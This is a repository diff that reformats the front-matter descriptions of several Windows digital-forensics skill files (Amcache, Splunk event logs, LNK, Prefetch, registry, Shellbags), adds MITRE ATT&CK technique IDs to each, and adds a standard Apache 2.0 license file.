description: 'Parses and analyzes the Windows Amcache.hve registry hive to extract
evidence of program execution, application installation, and driver loading for
digital forensics investigations. Uses Eric Zimmerman''s AmcacheParser and Timeline
Explorer for artifact extraction, SHA-1 hash correlation with threat intel, and
timeline reconstruction. Activates for requests involving Amcache forensics, program
execution evidence, Windows artifact analysis, or application compatibility cache
investigation.
'
domain: cybersecurity
@@ -24,6 +27,12 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1070.004
- T1070.006
- T1036.005
- T1014
- T1005
---
# Analyzing Windows Amcache Artifacts
skills/analyzing-windows-event-logs-in-splunk/SKILL.md
+12 -4
View File
@@ -1,9 +1,10 @@
---
name: analyzing-windows-event-logs-in-splunk
description: 'Analyzes Windows Security, System, and Sysmon event logs in Splunk to detect authentication attacks, privilege
escalation, persistence mechanisms, and lateral movement using SPL queries mapped to MITRE ATT&CK techniques. Use when SOC
analysts need to investigate Windows-based threats, build detection queries, or perform forensic timeline analysis of Windows
endpoints and domain controllers.
description: 'Analyzes Windows Security, System, and Sysmon event logs in Splunk to
detect authentication attacks, privilege escalation, persistence mechanisms, and
lateral movement using SPL queries mapped to MITRE ATT&CK techniques. Use when SOC
analysts need to investigate Windows-based threats, build detection queries, or
perform forensic timeline analysis of Windows endpoints and domain controllers.
'
domain: cybersecurity
@@ -30,6 +31,13 @@ nist_csf:
- DE.AE-02
- RS.MA-01
- DE.AE-06
mitre_attack:
- T1110
- T1053.005
- T1547.001
- T1021.002
- T1558.003
- T1003.006
---
# Analyzing Windows Event Logs in Splunk
skills/analyzing-windows-lnk-files-for-artifacts/SKILL.md
+8 -2
View File
@@ -1,7 +1,7 @@
---
name: analyzing-windows-lnk-files-for-artifacts
description: Parse Windows LNK shortcut files to extract target paths, timestamps, volume information, and machine identifiers
for forensic timeline reconstruction.
description: Parse Windows LNK shortcut files to extract target paths, timestamps,
volume information, and machine identifiers for forensic timeline reconstruction.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -19,6 +19,12 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1547.001
- T1204.002
- T1005
- T1025
- T1074.001
---
# Analyzing Windows LNK Files for Artifacts
skills/analyzing-windows-prefetch-with-python/SKILL.md
+8 -5
View File
@@ -1,7 +1,8 @@
---
name: analyzing-windows-prefetch-with-python
description: Parse Windows Prefetch files using the windowsprefetch Python library to reconstruct application execution history,
detect renamed or masquerading binaries, and identify suspicious program execution patterns.
description: Parse Windows Prefetch files using the windowsprefetch Python library
to reconstruct application execution history, detect renamed or masquerading binaries,
and identify suspicious program execution patterns.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -12,9 +13,11 @@ tags:
- incident-response
- malware-analysis
mitre_attack:
- T1059
- T1204
- T1036
- T1036.005
- T1070.004
- T1070
- T1003.001
- T1057
version: '1.0'
author: mahipal
license: Apache-2.0
skills/analyzing-windows-registry-for-artifacts/SKILL.md
+8 -2
View File
@@ -1,7 +1,7 @@
---
name: analyzing-windows-registry-for-artifacts
description: Extract and analyze Windows Registry hives to uncover user activity, installed software, autostart entries, and
evidence of system compromise.
description: Extract and analyze Windows Registry hives to uncover user activity,
installed software, autostart entries, and evidence of system compromise.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -19,6 +19,12 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1012
- T1547.001
- T1112
- T1003.002
- T1025
---
# Analyzing Windows Registry for Artifacts
skills/analyzing-windows-shellbag-artifacts/SKILL.md
+9 -3
View File
@@ -1,8 +1,8 @@
---
name: analyzing-windows-shellbag-artifacts
description: Analyze Windows Shellbag registry artifacts to reconstruct folder browsing activity, detect access to removable
media and network shares, and establish user interaction with directories even after deletion using SBECmd and ShellBags
Explorer.
description: Analyze Windows Shellbag registry artifacts to reconstruct folder browsing
activity, detect access to removable media and network shares, and establish user
interaction with directories even after deletion using SBECmd and ShellBags Explorer.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -24,6 +24,12 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1083
- T1074.001
- T1135
- T1025
- T1070.004
---
# Analyzing Windows Shellbag Artifacts
skills/assessing-vector-and-embedding-weaknesses/LICENSE
+201
View File
@@ -0,0 +1,201 @@
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to the Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by the Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding any notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. Please do not remove or change
the license header comment from a contributed file except when
necessary.
Copyright 2026 mukul975
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

Some files were not shown because too many files have changed in this diff Show More